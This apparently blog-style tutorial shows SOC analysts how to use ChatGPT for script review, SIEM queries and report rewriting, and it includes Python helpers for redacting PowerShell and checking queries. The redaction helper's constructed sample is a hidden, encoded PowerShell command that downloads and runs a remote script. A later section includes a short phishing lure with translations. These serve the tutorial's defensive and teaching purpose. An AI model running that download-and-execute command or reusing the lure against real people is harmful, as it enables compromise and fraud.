How to use ChatGPT as a SOC analyst
- Aug 4, 2024
- 7 min read

How to use ChatGPT as a SOC analyst?
This KB covers what ChatGPT is, a disclaimer on using it at work, and how to put it to use as a SOC analyst.
What Is ChatGPT?
ChatGPT is the most capable chatbot most of us have ever used. There are all sorts of fancy words to describe how it works, like Large Language Model (LLM), Generative Pre-trained Transformer (GPT), or Machine Learning Driven Research Stealing Internet Models Without Giving Credit to People (MLDRSIMGCP). I just made the last one up, but it sounds right. It is designed for natural language understanding and generation: you can ask it questions, get information, converse, or seek assistance. The model was trained on a large body of Internet text, which is why it can answer on almost any topic. It is useful, but limited.
It is important to note that while ChatGPT can give helpful and informative responses, it is not always accurate or contextually appropriate, and it delivers wrong answers in the same confident tone as right ones.
Almost everything about being a SOC analyst happens in real time. ChatGPT 3.5 cannot look up website reputation, IP reputation, file reputation, or whois information, and it cannot perform any of the other steps described in The SOC Analyst Method. At the time of this writing, its training data only runs up to January 2022. Since most indicators of compromise have a short shelf life, using ChatGPT to verify the reputation of an IOC is out of the question; it will often answer anyway, with a verdict that is not backed by any lookup.
But there are a few applications for ChatGPT that you will find very relevant as a new SOC analyst, which can help springboard your career and take some of the pressure off the firehose you'll drink from in your first year.
Disclaimer on Terms of Service for ChatGPT
No one ever reads the terms of service for a product, but you might want to glance over ChatGPT's before you use it at work, say to analyze some code found on a computer you're investigating. Once you paste it, OpenAI, which created ChatGPT, has a copy of that code on its systems. You might ask, "So what?" The code triggered an alert, and you were just doing your job, right? But what if you work for a software company and the code is part of an unreleased application still under development? You have just handed it to a third party. Consumer ChatGPT conversations are retained by OpenAI and, depending on your account settings, can be used to train future models; the API and enterprise offerings carry different data-use terms, which is one reason some companies allow one and forbid the other, and others ban LLM tools outright. Before using ChatGPT for official business, find out your organization's policy, and even where it is allowed, strip credentials, internal hostnames and addresses, and anything else you would not put in a public ticket before you paste.
With that said, let’s have some fun.
Code Review
ChatGPT can recognize common malicious patterns and reason about what a script does, and it can point out vulnerabilities, but not better than tools built for that task. You might find an occasion to paste a script into ChatGPT and have it explain the script's purpose and behavior without reading it line by line, even if you know the language. You can also ask whether it looks malicious and use the answer as a starting point for your own analysis. This is particularly helpful when looking at PowerShell surfaced by your endpoint tool, or JavaScript from an IPS alert: pop the script into ChatGPT and ask questions about it. In practice, though, this is rarely the first step. If you are seeing the script at all, your endpoint tool, IPS, WAF, or whatever else has already flagged it, and those tools should be your first source of truth because that is what they specialize in. When they don't give you enough information, pasting the script into ChatGPT can add insight. Treat the answer as a lead, not a verdict: the model reads the script's comments and strings as text, so a sample whose comments claim it is a harmless updater may well be described as one.
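Before pasting a script into ChatGPT, it is worth doing the two things the disclaimer above and this section both call for: decode it yourself, and take out anything you would not want on a third party's systems. The following is an added example, not code from the original article: a small Python helper that decodes a PowerShell -EncodedCommand payload (base64 of UTF-16LE, which is how powershell.exe takes it), replaces IP addresses, bearer tokens and DOMAIN\user account names with numbered placeholders, keeps the placeholder-to-value map locally so you can read the real values back into the model's answer, and builds the prompt. The command line, the token and the addresses in it are constructed for the example; the redaction rules are deliberately simple and should be extended for your environment.

```python
import base64
import re

# Constructed sample: a PowerShell command line of the kind an EDR alert shows.
# The inner script below was written for this example (it is not from any real
# incident); it carries the sort of detail you would not want to hand to a
# third party: an internal IP, a bearer token and a domain account.
INNER_SCRIPT = (
    '$u="http://10.20.30.40:8080/update.ps1";'
    '$h=@{Authorization="Bearer sk-abcdef1234567890abcdef"};'
    'Invoke-WebRequest -Uri $u -Headers $h -OutFile $env:TEMP\\u.ps1;'
    '$acct="corp\\jsmith";'
    'powershell -ep bypass -f $env:TEMP\\u.ps1'
)
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + base64.b64encode(INNER_SCRIPT.encode("utf-16le")).decode("ascii")
)

# powershell.exe accepts -EncodedCommand and any unambiguous prefix of it
# (-e, -ec, -enc ...) followed by base64 of a UTF-16LE string. This covers the
# spellings seen most often; extend the alternation if your alerts use another.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                      re.IGNORECASE)

# Redaction rules, applied in order. Over-redacting is the safe direction: a
# dotted version number mistaken for an IP costs nothing, a leaked token does.
RULES = [
    ("IP", re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")),
    ("TOKEN", re.compile(r"(?<=[Bb]earer )[A-Za-z0-9._-]{16,}")),
    # DOMAIN\user, but not drive letters (C:\...) or path components (...\Temp\x)
    ("USER", re.compile(r"(?<![:\\\w])[A-Za-z0-9_-]+\\[A-Za-z][A-Za-z0-9._-]+")),
]


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def redact(text):
    """Swap sensitive values for numbered placeholders; return (text, mapping).

    The mapping (placeholder -> real value) never leaves your machine; it lets
    you put the real values back into whatever the model tells you.
    """
    mapping = {}

    def placeholder_for(kind, value):
        for ph, known in mapping.items():
            if known == value:
                return ph  # same value seen twice gets the same placeholder
        ph = f"<{kind}_{sum(p.startswith('<' + kind + '_') for p in mapping) + 1}>"
        mapping[ph] = value
        return ph

    for kind, rx in RULES:
        text = rx.sub(lambda m, k=kind: placeholder_for(k, m.group(0)), text)
    return text, mapping


def restore(text, mapping):
    """Put the real values back into text the model returned."""
    for ph, value in mapping.items():
        text = text.replace(ph, value)
    return text


PROMPT_HEADER = (
    "Explain step by step what the following PowerShell does and whether any of "
    "it is typical of malware. Values in angle brackets are redacted; do not "
    "guess what they are.\n\n"
)


def build_prompt(cmdline):
    """Decode, redact and wrap a command line; returns (prompt, local mapping)."""
    script = decode_encoded_command(cmdline) or cmdline
    redacted, mapping = redact(script)
    return PROMPT_HEADER + redacted, mapping


if __name__ == "__main__":
    prompt, mapping = build_prompt(SAMPLE_CMDLINE)
    print(prompt)                     # this is what you paste into ChatGPT
    print("kept locally:", mapping)   # this is what you do not
```

Run it and paste only the printed prompt; when the model's explanation mentions `<IP_1>` or `<USER_1>`, `restore()` turns it back into a sentence about your real host and account for the ticket. The decoded script, not the base64 blob, is what you want the model to read: asking it to decode for you invites it to guess.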
EXERCISE ONE
Go to https://github.com/explore and find a random, publicly available piece of code and copy it into the ChatGPT message bar and ask, “What does the above code do?”
This will show you how effortlessly ChatGPT can be used. It doesn't matter whether the code is 20 lines or 500 lines long; ChatGPT will explain the purpose of the code in plain language.
File Paths
You might find an opportunity to paste a file path into ChatGPT to have it judge whether it belongs to a legitimate application. Remember that its knowledge is about two years old, so it can only tell you what it has seen before; an unfamiliar path is not evidence that something is malicious. New legitimate files appear daily, and old files get new paths. Sometimes it is worth a quick check to confirm a file is in the expected place, but a path alone proves little, since malware routinely drops into legitimate directories or borrows legitimate names; confirm with the file's signature or hash as well.
EXERCISE TWO
Go to ChatGPT and type in:
“Is this file path malicious C:\WINDOWS\System32\Wbem”
“What file path does Malwarebytes typically install to?”
Creating Queries for SOC Analysts
ChatGPT can write YARA rules, Suricata rules, KQL queries, SPL queries, and many other syntaxes for threat hunting or for creating rules and alerts. This is the most effective and helpful way to leverage ChatGPT as an analyst, and it does it fairly well: you describe in plain language what you want to find. This is extremely helpful as a new SOC analyst, because you probably still need to gain familiarity with these tools before you can write custom hunts or alerts yourself. The output will need editing, field names especially: the model has no idea what your data looks like, so check every field, index, and sourcetype name against your environment. Even so, it is much easier than starting from scratch.
EXERCISE THREE
Go to ChatGPT and tell it, "Write a Splunk query that shows me all logs that contain hashes from all indexes"
Enter that query into Splunk; in the cyber range, the result is every event carrying a file hash, which is all the malware we've captured so far. For each hash:
- Search for the hash on VirusTotal.
- Google the hash for sandbox results.
- Are there any interesting websites with information about it on Google?
1. What is the name of the tool or malware that this hash relates to?
2. What do you think the attacker was looking for?
EXERCISE FOUR
Go to ChatGPT and tell it, "Write a Splunk query that creates a table of the most frequent source IP addresses, in descending order, over the past 24 hours."
Be sure to read the ChatGPT output and change "src_ip" to "src", which is the field name the cyber range data actually uses.
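To check what the model hands you in exercises three and four, it helps to know what the right answer looks like on data you control. The following is an added example, not part of the original exercises or the cyber range: a Python script over a handful of constructed events that does by hand what the two queries should do (pull out MD5, SHA-1 and SHA-256 hashes with the events that carry them; count source IPs over the last 24 hours, most frequent first) and flags field names in a generated SPL query that none of the data has, which is exactly the src_ip versus src mismatch above. LLM_QUERY is a plausible generated query written for the example, not ChatGPT's actual output; the hashes are those of the empty input, and the addresses come from the RFC 5737 documentation ranges. Once the script agrees with what Splunk shows you, carry on with the IP investigation steps that follow.

```python
import re
from collections import Counter

NOW = 1_700_000_000  # fixed "now" so the 24-hour window is reproducible

# Constructed sample events standing in for what the indexes return. The hashes
# are the SHA-256, MD5 and SHA-1 of the empty input, placeholders rather than
# any real malware hash; the addresses are RFC 5737 documentation addresses.
SHA256_EMPTY = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
MD5_EMPTY = "d41d8cd98f00b204e9800998ecf8427e"
SHA1_EMPTY = "da39a3ee5e6b4b0d3255bfef95601890afd80709"

SAMPLE_EVENTS = [
    {"index": "edr", "_time": NOW - 100, "src": "203.0.113.7",
     "_raw": f"EventCode=1 Image=C:\\Windows\\Temp\\svc.exe Hashes=SHA256={SHA256_EMPTY}"},
    {"index": "mail", "_time": NOW - 3600, "src": "198.51.100.22",
     "_raw": f"action=quarantined file=invoice.docm md5={MD5_EMPTY}"},
    {"index": "edr", "_time": NOW - 7200, "src": "203.0.113.7",
     "_raw": f"EventCode=1 Image=C:\\Users\\Public\\svc.exe Hashes=SHA256={SHA256_EMPTY}"},
    {"index": "fw", "_time": NOW - 86000, "src": "203.0.113.7",
     "_raw": "action=allowed dest_port=443"},
    {"index": "fw", "_time": NOW - 90000, "src": "192.0.2.5",  # older than 24h
     "_raw": "action=blocked dest_port=4444"},
    {"index": "proxy", "_time": NOW - 200, "src": "198.51.100.22",
     "_raw": f"status=200 uri=/update.ps1 sha1={SHA1_EMPTY}"},
]

# A query of the kind the model returns for exercise four (written for this
# example). It references src_ip, which none of the data has.
LLM_QUERY = "index=* earliest=-24h | stats count by src_ip | sort -count | head 10"

# Longest alternative first, so a SHA-256 is not reported as an MD5 prefix.
HASH_RX = re.compile(r"\b(?:[0-9a-f]{64}|[0-9a-f]{40}|[0-9a-f]{32})\b", re.IGNORECASE)
HASH_TYPES = {64: "sha256", 40: "sha1", 32: "md5"}


def find_hashes(events):
    """Exercise three by hand: each hash, its type, how many events carry it
    and in which indexes."""
    found = {}
    for ev in events:
        for h in HASH_RX.findall(ev["_raw"]):
            h = h.lower()
            entry = found.setdefault(
                h, {"type": HASH_TYPES[len(h)], "count": 0, "indexes": set()})
            entry["count"] += 1
            entry["indexes"].add(ev["index"])
    return found


def top_sources(events, field="src", now=NOW, window=24 * 3600, limit=10):
    """Exercise four by hand: (ip, count) pairs for the last `window` seconds,
    most frequent first; window=None means all time."""
    counts = Counter(
        ev[field] for ev in events
        if field in ev and (window is None or now - ev["_time"] <= window)
    )
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))[:limit]


KV_RX = re.compile(r"\b([A-Za-z_]\w*)\s*=")            # field=value, in SPL or _raw
BY_RX = re.compile(r"\bby\s+([A-Za-z_]\w*)", re.IGNORECASE)
TIME_MODIFIERS = {"earliest", "latest"}                # search options, not fields


def known_fields(events):
    """Fields Splunk would offer: the indexed ones plus the key=value pairs it
    auto-extracts from _raw (an approximation of search-time extraction)."""
    fields = set()
    for ev in events:
        fields.update(ev.keys())
        fields.update(KV_RX.findall(ev["_raw"]))
    return fields


def unknown_fields(spl, events):
    """Field names a generated query references that none of the data has."""
    referenced = set(KV_RX.findall(spl)) | set(BY_RX.findall(spl))
    return referenced - TIME_MODIFIERS - known_fields(events)


if __name__ == "__main__":
    for h, info in find_hashes(SAMPLE_EVENTS).items():
        print(info["type"], h, info["count"], sorted(info["indexes"]))
    print(top_sources(SAMPLE_EVENTS))
    print("fields to fix:", unknown_fields(LLM_QUERY, SAMPLE_EVENTS))
```

The field check is the part worth keeping: run every generated query through something like `unknown_fields()` against a sample of your own events before you trust an empty result, because a query over a field that does not exist returns nothing and looks exactly like "no malicious activity".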
- Take the IP addresses and look them up on VirusTotal.
- Take the IP addresses and look them up on IPVoid.
- Now Google the IP address and see what open source intelligence you can glean.
- Now do a whois on the IP address to get context on who owns it.
1. Do you think this IP address is malicious?
2. Are there any other things hosted at this IP address?
3. How long do you think this IP address has been used this way?
Rewriting
One useful function, especially for those writing in a non-native language, is the ability to have ChatGPT rewrite your sentences. Report writing and rewriting the summaries from the SOC Analyst Method are valuable to us, as the SOC is often a global workplace. English might not be our first language, and even when it is, it may benefit you to have ChatGPT produce the write-up. I gave it details and asked it to write a formal Root Cause Analysis (RCA). With minimal editing afterward, I could deliver it to a customer, saving time. But be careful: sometimes ChatGPT misconstrues the meaning behind your words and adds ambiguity and vagueness where there was once clarity. You may be surprised at the result, but don't let it misinterpret your findings.
EXERCISE FIVE
Ask ChatGPT to rewrite the Declaration of Independence.
Would you allow ChatGPT to rewrite things without approval?
ChatGPT as a Weapon
We've discussed how ChatGPT can aid junior analysts in their day-to-day work; now let's talk about how bad actors can use it. In a previous article, we covered phishing. To recap, phishing is a crafted email meant to get a user to visit a malicious website or download a malicious file. Historically, one of the tell-tale signs of a phishing email was typos or grammatical errors, often because English was not the author's first language. Now, through the magic of LLMs, an attacker can write an email in their native language, give it to ChatGPT, and have it translated into any language they want, more fluently than traditional machine translators manage. Let's give it a try; the following is a short phishing email I wrote in English.
“Hello, EvilWebsite.com is committed to providing you with the best possible shopping experience. Our website features the latest products from top brands, and we regularly offer discounts and promotions to help you save money. Click the link below for free shipping on your first order.”
Now, let’s see what ChatGPT outputs when I ask for it to be written in Spanish.
“Hola, EvilWebsite.com está comprometido a ofrecerte la mejor experiencia de compra posible. Nuestro sitio web presenta los últimos productos de las mejores marcas, y regularmente ofrecemos descuentos y promociones para ayudarte a ahorrar dinero. Haz clic en el enlace de abajo para obtener envío gratuito en tu primer pedido.”
How about German?
"Hallo, EvilWebsite.com ist dazu verpflichtet, Ihnen das bestmögliche Einkaufserlebnis zu bieten. Unsere Webseite bietet die neuesten Produkte von Top-Marken, und wir bieten regelmäßig Rabatte und Aktionen an, um Ihnen zu helfen, Geld zu sparen. Klicken Sie auf den untenstehenden Link für kostenlosen Versand bei Ihrer ersten Bestellung.”
Regardless of the language, ChatGPT converts it with minimal effort, and the result reads as if a native speaker wrote it. Overall, OpenAI has done a good job of making ChatGPT a relatively safe tool: in its early days you could have it write simple scripts to destroy a computer's filesystem, and the guardrails have tightened since. However, ChatGPT is only one of many LLMs on the Internet. At DEF CON 31, there were multiple demonstrations of locally hosted LLMs trained to develop malicious code or run a malware command-and-control server. As AI progresses, we will continue to see it used by hacking groups and scammers.
Summary
While ChatGPT is relatively straightforward to use, knowing when to use it is a little more complex. As we've discussed, it does not contain real-time information, which limits its value to us as SOC analysts. Its most valuable use case is writing queries for you in languages you likely haven't come across yet, making security analysis tools faster and more accessible. As ChatGPT continues to improve, even adding the ability to search the Internet, it will become more relevant to us; it will still be limited, though, in the data it can reach without licenses to the tools we rely on. Rewriting is another function that can help with communication, since the SOC is a global workplace, often with challenging barriers for those whose first language isn't English. Lastly, you can always query ChatGPT for general information about cybersecurity as you would Google, for example what a particular Windows Event ID means; it can save a few minutes of searching when it gives the correct answer immediately, and when the answer matters, confirm it against the vendor's documentation.
